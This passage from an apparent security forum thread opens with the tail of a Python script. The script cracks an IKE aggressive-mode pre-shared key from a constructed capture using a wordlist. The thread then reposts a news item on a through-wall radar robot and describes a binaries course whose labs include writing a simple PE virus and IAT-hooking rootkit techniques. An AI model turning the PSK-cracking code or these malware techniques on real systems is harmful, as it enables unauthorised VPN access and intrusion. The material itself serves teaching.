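        "sai_b": rb(56),                       # body of the initiator's SA payload (constructed)
        # IDir_b: ID payload body = type (IPV4_ADDR=1), protocol (UDP), port 500, address
        "idir_b": bytes([1, 17]) + (500).to_bytes(2, "big") + bytes([10, 0, 0, 1]),
    }
    cap["hash_r"] = hash_r(skeyid(psk, cap["nonce_i"], cap["nonce_r"], hash_name), cap, hash_name)
    return cap


if __name__ == "__main__":
    # Assumed PSK and wordlist, chosen only to show the attack succeeding.
    capture = make_capture(b"cisco123")
    words = ["password", "admin", "cisco123", "letmein"]
    print("recovered PSK:", crack_psk(capture, words))
```

Note that the hash used must match what the initiator proposed; guessing with the wrong prf (e.g. MD5 against a SHA1 exchange) never matches, which is why a real tool reads the transform attributes out of SAi_b before starting. The per-candidate cost here is two HMACs, which is the "4 MD5's and 4 64 byte XORs" the Performance section counts.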
  24. [h=2]A Robot… That Can See Through Walls![/h] posted Dec 26th 2011 3:56pm by Jeremy Cook Robots on four wheels are fun on their own merits, but one thing that most lack is the ability to see through walls. With its onboard radar system, this bot is equipped to see objects that a person couldn’t normally detect on the other side of the wall. Although some of the more “nuts and bolts” details of this build are missing, the robot uses an Ultra-Wideband Radar system called the [D1] Radar System. This system can, according to their documentation, “Avoid false positives caused by vapor, dust, smoke, rain or other small particles.” Apparently this means drywall as well if programmed correctly. In the video after the break, the robot’s sensor package is programmed to ignore anything within 1.5 meters. This allows the robot to mirror the movement of the apparent shelving unit on the other side. This sensor could certainly have some interesting robotics applications besides imitating a rolling shelf, so we’re excited to see what it will be used for! Sursa: A Robot… That Can See Through Walls! - Hack a Day
  25. The Life of Binaries Creator: Xeno Kovah License: Creative Commons Share-Alike (http://creativecommons.org/licenses/by-sa/3.0/)
Lab Requirements: Requires a Windows system with Visual C++ Express Edition, Windows DDK or WDK kernel module compilation environment, and WinDbg. Requires a Windows guest OS running in VMWare Player or VMWare Server in order to do kernel debugging with WinDbg from the host OS.
Recommended Class Duration: 3 days (class previously taught in 2 days which was too little)
Creator Available for Training: Yes
Author Comments: Topics include but are not limited to:
•Scanning and tokenizing source code.
•Parsing a grammar.
•Different targets for x86 assembly object files generation. (E.g. relocatable vs. position independent code).
•Linking object files together to create a well-formed binary.
•Detailed descriptions of the high level similarities and low level differences between the Windows PE and Linux ELF binary formats. (NOTE: we didn't get to this in the class where the video was recorded, but the materials are in the slides)
•How an OS loads a binary into memory and links it on the fly before executing it.
Along the way we discuss the relevance of security at different stages of a binary’s life, from the tricks that can be played by a malicious compiler, to how viruses really work, to the way which malware “packers” duplicate OS process execution functionality, to the benefit of a security-enhanced OS loader which implements address space layout randomization (ASLR).
Lab work includes:
•Manipulating compiler options to change the type of assembly which is output
•Manipulating linker options to change the structure of binary formats
•Reading and understanding PE files with PEView
•Reading and understanding ELF files with Readelf (NOTE: we didn't get to this in the class where the video was recorded, but the materials are in the slides)
•Using WinDbg and/or GDB to watch the loader dynamically link an executable
•Using Thread Local Storage (TLS) to obfuscate control flow and serve as a basic anti-debug mechanism
•Creating a simple example virus for PE
•Analyze the changes made to the binary format when a file is packed with UPX
•Using the rootkit technique of Import Address Table (IAT) hooking to subvert the integrity of a program’s calls to external libraries, allowing files to be hidden.
Knowledge of this material is recommended, but not required, for future classes such as Rootkits, but is required for reverse engineering. To submit any suggestions, corrections, or explanations of things I didn’t know the reasons for, please email me at the address included in the slides.
All Materials: LoBSlidesOnly.zip LoBCodeOnly.zip
Videos of the class hosted at archive.org. These are useful for students, but also more useful for potential instructors who would like to teach this material. By watching the video, you will better understand the intent of some slides which do not stand on their own. You are recommended to watch the largest size video so that the most possible text is visible without having to follow along in the slides:
Online: Day 1 Part 1, Day 1 Part 2, Day 1 Part 3, Day 1 Part 4, Day 1 Part 5, Day 1 Part 6, Day 2 Part 1, Day 2 Part 2, Day 2 Part 3, Day 2 Part 4, Day 2 Part 5, Day 2 Part 6
Download videos:
http://www.archive.org/download/TheLifeOfBinariesDay1Part1/PR_LifeOfBinariesDay1Part1.mp4
http://www.archive.org/download/TheLifeOfBinariesDay1Part2/PR_LifeOfBinariesDay1Part2.mp4
http://www.archive.org/download/TheLifeOfBinariesDay1Part3/PR_LifeOfBinariesDay1Part3.mp4
http://www.archive.org/download/TheLifeOfBinariesDay1Part4/PR_LifeOfBinariesDay1Part4.mp4
http://www.archive.org/download/TheLifeOfBinariesDay1Part5/PR_LifeOfBinariesDay1Part5.mp4
http://www.archive.org/download/TheLifeOfBinariesDay1Part6/PR_LifeOfBinariesDay1Part6.mp4
http://www.archive.org/download/TheLifeOfBinariesDay2Part1/PR_LifeOfBinariesDay2Part1.mp4
http://www.archive.org/download/TheLifeOfBinariesDay2Part2/PR_LifeOfBinariesDay2Part2.mp4
http://www.archive.org/download/TheLifeOfBinariesDay2Part3/PR_LifeOfBinariesDay2Part3.mp4
http://www.archive.org/download/TheLifeOfBinariesDay2Part4/PR_LifeOfBinariesDay2Part4.mp4
http://www.archive.org/download/TheLifeOfBinariesDay2Part5/PR_LifeOfBinariesDay2Part5.mp4
http://www.archive.org/download/TheLifeOfBinariesDay2Part6/PR_LifeOfBinariesDay2Part6.mp4
Revision History: 09-06-2011 - Videos uploaded; 02-16-2011 - Initial class content upload
If you have used and modified this material, we would appreciate it if you submit your modified version for publishing here, so that all versions can benefit from your changes. Sursa: LifeOfBinaries